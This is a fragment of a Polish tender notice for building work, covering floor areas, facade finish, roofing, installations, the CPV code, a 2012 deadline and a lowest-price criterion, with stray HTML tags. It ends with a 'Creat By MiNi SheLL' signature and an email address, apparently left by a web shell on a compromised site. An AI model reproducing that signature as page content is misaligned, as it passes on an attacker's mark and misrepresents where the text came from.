Powierzchnia użytkowa biurowa 42,60 m2
Powierzchnia gospodarczo-magazynowa 56,86 m2
Powierzchnia użytkowa całego budynku 99,46 m2
Kubatura wg PN-ISO 9836:1997 481,10 m3

Elewacje.
Ściany zewnętrzne budynku tynkowane tynkiem cienkowarstwowym akrylowym - dla styropianu, malowane farbami elewacyjnymi w jasnym kolorze. Zaproponowano kolorystykę w systemie CERESIT: kolor SAHARA SH4. Cokół obłożony płytkami gresowymi lub okładziną kamienną lub tynkiem mozaikowym żywicznym w kolorze grafitowym.
Parapety zewnętrzne- klinkierowe lub z blachy powlekanej ocynkowanej.

Dach pokryty blachą. Na rysunkach technicznych podane zostały przekroje warstw dachu. Dach w kolorze istniejącym- czerwonym.
Orynnowanie, obróbki blacharskie należy wykonać z blachy stalowej powlekanej. Kolor obróbek, rynien, rur spustowych czerwony.

W budynku przewiduje się następujące instalacje wewnętrzne:
wodno-kanalizacyjną,
elektryczną,
grzewczą
instalacja ciepłej wody użytkowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com